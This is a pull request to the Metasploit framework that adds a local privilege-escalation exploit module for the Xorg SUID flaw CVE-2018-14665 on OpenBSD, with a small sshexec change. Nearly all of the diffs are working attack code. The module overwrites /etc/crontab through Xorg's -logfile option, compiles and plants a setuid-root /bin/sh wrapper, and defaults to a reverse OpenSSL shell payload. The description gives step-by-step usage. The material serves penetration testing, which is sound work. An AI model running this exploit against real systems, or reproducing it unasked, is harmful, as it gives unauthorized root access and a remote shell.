### PR TITLE
Add module Xorg Suid Server privesc for OpenBSD

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -109,6 +109,13 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch'     => ARCH_PYTHON,
               'Platform' => 'python'
             }
+          ],
+          [
+            'Unix Cmd',
+            {
+              'Arch'     => ARCH_CMD,
+              'Platform' => 'unix'
+            }
           ]
         ],
       'DefaultTarget'    => 0,
@@ -180,8 +187,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
+
     if target['Platform'] == 'python'
       execute_command("python -c \"#{payload.encoded}\"")
+    end
+
+    if target['Platform'] == 'unix'
+      execute_command("#{payload.encoded}")
     else
       execute_cmdstager(linemax: 500)
     end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Local
 
         This module writes a cron job using the Xorg -logfile option. The job
         will run a small script to launch an executable or be launched. It has been
-        tested with OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions.      
-        Success on CentOS depends on the session right to console for starting Xorg 
+        tested with OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions.
+        Success on CentOS depends on the session right to console for starting Xorg
         along with selinux settings, it may work but is currently not supported.
 
       },
@@ -144,11 +144,10 @@ class MetasploitModule < Msf::Exploit::Local
       print_good 'Cleaning up and restoring crontab entries'
       cmd_exec "cat #{pscript}.b > /etc/crontab"
       cmd_exec "rm -f /etc/crontab.old"
-      cmd_exec "cat #{pscript}.b > /etc/crontab"
-      cmd_exec "rm -f #{pscript}.b"
     else
       print_status "This session does not have root"
       print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
+      print_warning "rm -f /etc/crontab.old"
     end
   end
 end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -24,10 +24,10 @@ class MetasploitModule < Msf::Exploit::Local
         and run arbitrary code under root privileges (CVE-2018-14665).
 
         This module writes a cron job using the Xorg -logfile option. The job
-        will run a small script to launch an executable or be launched. It has been
-        tested with OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions.
-        Success on CentOS depends on the session right to console for starting Xorg
-        along with selinux settings, it may work but is currently not supported.
+        will run a small script to launch an executable. It has been tested with
+        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
+        on CentOS depends on the session having console for starting Xorg
+        along with selinux settings, may work but is currently not supported.
 
       },
       'License'        => MSF_LICENSE,
@@ -37,26 +37,23 @@ class MetasploitModule < Msf::Exploit::Local
           'Raptor - 0xdea',  # Modified exploit for cron
           'Aaron Ringo'      # Metasploit module
         ],
+
       'DisclosureDate' => 'Oct 25 2018',
-      'Platform'       => %w(openbsd),
-      'Arch'           => [ ARCH_CMD ],
-      'SessionTypes'   => [ 'shell' ], #Shell is needed to start Xorg in Linux
+      'Platform'       =>  %w(linux unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell', #Shell is needed to start Xorg in Linux
       'Targets'        =>
-         [['OpenBSD', {
+         [
+           ['OpenBSD', {
             'Platform' => 'unix',
-            'Arch' => [ ARCH_CMD ] } ]],
+            'Arch' => [ ARCH_CMD ] } ]
+          ],
       'DefaultOptions' =>
          {
              'Target'  => '0',
              'PAYLOAD' => 'cmd/unix/reverse_openssl'
          },
-      'References'     =>
-        [
-          [ 'CVE', '2018-14665' ],
-          [ 'BID', '105741' ],
-          [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
-          [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
-        ]
+
     ))
     register_options(
       [
@@ -95,8 +92,12 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     check_status = check
-    unless check_status == CheckCode::Safe
-       print_status "Exploit passed initial checks!"
+    unless check_status == CheckCode::Appears
+       fail_with Failure::NotVulnerable, "Target not vulnerable"
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
     end
 
     # Defines path to script that will chmod the payload
@@ -111,12 +112,11 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Upload for the text payloads
     if builtin_only == 'false'
-      print_status "Using your payload"
-      print_warning "Based on where we hit in cron may run twice"
+      print_status 'Uploading your payload'
       exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
       cmd_exec "echo \"#{exp}\" >> #{pscript}"
     else
-      print_good "Attempting privesc within current session"
+      print_good 'Attempting privesc within current session'
       cmd_exec "echo cp /bin/sh #{payload_path} > #{pscript}"
       cmd_exec "echo \'main(){setuid(0);setgid(0);system(\"/bin/sh\");}\' > #{payload_c}"
       cmd_exec "echo gcc #{payload_c} -o #{payload_path} >> #{pscript}"
@@ -130,22 +130,41 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec "cat /etc/crontab > #{pscript}.b"
 
     # Actual exploit
-    print_status 'Executing payload...'
+    print_status 'Trying /etc/crontab overwrite'
     cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
     sleep 5
     cmd_exec "pkill Xorg"
-    print_status 'So far so good, up to 120 seconds for cron'
-    sleep 110
-
-    #Become root, clean up a little
-    cmd_exec "#{payload_path}"
-    if is_root?
-      print_good 'Your session now has root privileges'
-      print_good 'Cleaning up and restoring crontab entries'
-      cmd_exec "cat #{pscript}.b > /etc/crontab"
-      cmd_exec "rm -f /etc/crontab.old"
+    sleep 5
+    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
+    if cron_check.include? pscript
+      print_good '/etc/crontab overwrite successful'
     else
-      print_status "This session does not have root"
+      fail_with Failure::NotVulnerable, "/etc/crontab not modified"
+    end
+
+    i = 0
+    while i < 12
+      print_status 'Waiting on cron to run'
+      sleep 10
+      i += 1
+      break if exists? payload_path
+      break if !exists? pscript      # will be cleaned up on successful exploit
+    end
+
+    #Time to become root and clean up a little
+    if builtin_only == 'true'
+      print_good 'Payload written..executing'
+      cmd_exec "#{payload_path}"
+      if is_root?
+        print_good 'Your session now has root privileges'
+        print_good 'Cleaning up and restoring crontab entries'
+        cmd_exec "cat #{pscript}.b > /etc/crontab"
+        cmd_exec "rm -f /etc/crontab.old"
+      end
+    else
+      sleep 5
+      print_status "This scripts session does not have root"
+      print_warning "You have some clean up to do in new session"
       print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
       print_warning "rm -f /etc/crontab.old"
     end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -53,7 +53,13 @@ class MetasploitModule < Msf::Exploit::Local
              'Target'  => '0',
              'PAYLOAD' => 'cmd/unix/reverse_openssl'
          },
-
+      'References'     =>
+         [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+         ]
     ))
     register_options(
       [

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -89,19 +89,12 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
-    write_file path, data
-    register_file_for_cleanup path
-  end
 
   def exploit
     check_status = check
     unless check_status == CheckCode::Appears
        fail_with Failure::NotVulnerable, "Target not vulnerable"
     end
-
     if is_root?
       fail_with Failure::BadConfig, 'This session already has root privileges'
     end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -63,8 +63,8 @@ class MetasploitModule < Msf::Exploit::Local
     ))
     register_options(
       [
-        OptString.new('SCRIPT', [ true, 'Script dirictory', '/tmp/' ]),
-        OptString.new('PAYLOAD_LOC', [ true, 'Path that contain SUID binary', '/usr/local/bin/shell' ]),
+        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
+        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
         OptBool.new('BUILTIN', [ true, "Privesc in current session ",true ])
       ])
   end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server SUID privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges with SUID Xorg X11 server
+        versions prior to 1.20.3.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg prior to 1.20.3.  This allows unprivileged users with the
+        ability to log in to the system via console to escalate their privileges
+        and run arbitrary code under root privileges (CVE-2018-14665).
+
+        This module writes a cron job using the Xorg -logfile option. The job
+        will run a small script to launch an executable or be launched. It has been
+        tested with OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions.      
+        Success on CentOS depends on the session right to console for starting Xorg 
+        along with selinux settings, it may work but is currently not supported.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+      'DisclosureDate' => 'Oct 25 2018',
+      'Platform'       => %w(openbsd),
+      'Arch'           => [ ARCH_CMD ],
+      'SessionTypes'   => [ 'shell' ], #Shell is needed to start Xorg in Linux
+      'Targets'        =>
+         [['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]],
+      'DefaultOptions' =>
+         {
+             'Target'  => '0',
+             'PAYLOAD' => 'cmd/unix/reverse_openssl'
+         },
+      'References'     =>
+        [
+          [ 'CVE', '2018-14665' ],
+          [ 'BID', '105741' ],
+          [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+          [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+        ]
+    ))
+    register_options(
+      [
+        OptString.new('SCRIPT', [ true, 'Script dirictory', '/tmp/' ]),
+        OptString.new('PAYLOAD_LOC', [ true, 'Path that contain SUID binary', '/usr/local/bin/shell' ]),
+        OptBool.new('BUILTIN', [ true, "Privesc in current session ",true ])
+      ])
+  end
+
+
+  def check
+    xorg_path = cmd_exec("which Xorg")
+    vprint_good "Xorg path found at #{xorg_path}"
+    if setuid? xorg_path
+      vprint_good "Xorg binary detected as SUID"
+      proc_list = []
+      proc_list = cmd_exec('ps ax')
+      if proc_list.include?("X")
+        vprint_warning("Xorg in process list, Can you stop it? ")
+        return CheckCode::Safe
+      else
+        vprint_good("Xorg does not appear running")
+        return CheckCode::Appears
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Safe
+       print_status "Exploit passed initial checks!"
+    end
+
+    # Defines path to script that will chmod the payload
+    builtin_only = "#{datastore['BUILTIN']}"
+    payload_path = "#{datastore['PAYLOAD_LOC']}"
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric rand(5..10)}"
+    payload_c = "#{pscript}.c"
+
+    # Universal stub for file crontab will run
+    cmd_exec "echo '#!/bin/sh' > #{pscript}"
+    cmd_exec "chmod +x #{pscript}"
+
+    # Upload for the text payloads
+    if builtin_only == 'false'
+      print_status "Using your payload"
+      print_warning "Based on where we hit in cron may run twice"
+      exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      cmd_exec "echo \"#{exp}\" >> #{pscript}"
+    else
+      print_good "Attempting privesc within current session"
+      cmd_exec "echo cp /bin/sh #{payload_path} > #{pscript}"
+      cmd_exec "echo \'main(){setuid(0);setgid(0);system(\"/bin/sh\");}\' > #{payload_c}"
+      cmd_exec "echo gcc #{payload_c} -o #{payload_path} >> #{pscript}"
+      cmd_exec "echo chmod 4777 #{payload_path} >> #{pscript}"
+      register_file_for_cleanup payload_c
+      register_file_for_cleanup payload_path
+    end
+    register_file_for_cleanup pscript
+
+    # Exploit steps on crontab so backing it up
+    cmd_exec "cat /etc/crontab > #{pscript}.b"
+
+    # Actual exploit
+    print_status 'Executing payload...'
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    sleep 5
+    cmd_exec "pkill Xorg"
+    print_status 'So far so good, up to 120 seconds for cron'
+    sleep 110
+
+    #Become root, clean up a little
+    cmd_exec "#{payload_path}"
+    if is_root?
+      print_good 'Your session now has root privileges'
+      print_good 'Cleaning up and restoring crontab entries'
+      cmd_exec "cat #{pscript}.b > /etc/crontab"
+      cmd_exec "rm -f /etc/crontab.old"
+      cmd_exec "cat #{pscript}.b > /etc/crontab"
+      cmd_exec "rm -f #{pscript}.b"
+    else
+      print_status "This session does not have root"
+      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
+    end
+  end
+end


### PR DESCRIPTION
Module adds the ability to privesc by overwriting crontab in session or spawn an external session.  It was tested on OpenBSD 6.3 and 6.4 along with CentOS 7.  The exploit did work on some linux configurations.

List the steps needed to make sure this thing works
To test you must have a session on an OpenBSD box.
With OpenBSD most shells will not function, openssl is default and it is also encrypted.
I modified my sshexec to take cmd/unix and will probably try to commit that later. (like 6 lines)  

To get a session with higher privileges
- [ ] use exploit/openbsd/local/xorg_x11_suid_server
- [ ]  set session 1
- [ ] set LHOST x.x.x.x
- [ ] exploit
![options](https://user-images.githubusercontent.com/3400203/47961882-d12b3580-dfd8-11e8-93df-567d49da88d1.png)

![local](https://user-images.githubusercontent.com/3400203/47961884-d12b3580-dfd8-11e8-85fe-23f539ac4635.png)


To get an external session with higher privileges
- [ ] set builtin false
![new_session](https://user-images.githubusercontent.com/3400203/47961883-d12b3580-dfd8-11e8-94a4-ab4e1204c2b4.png)



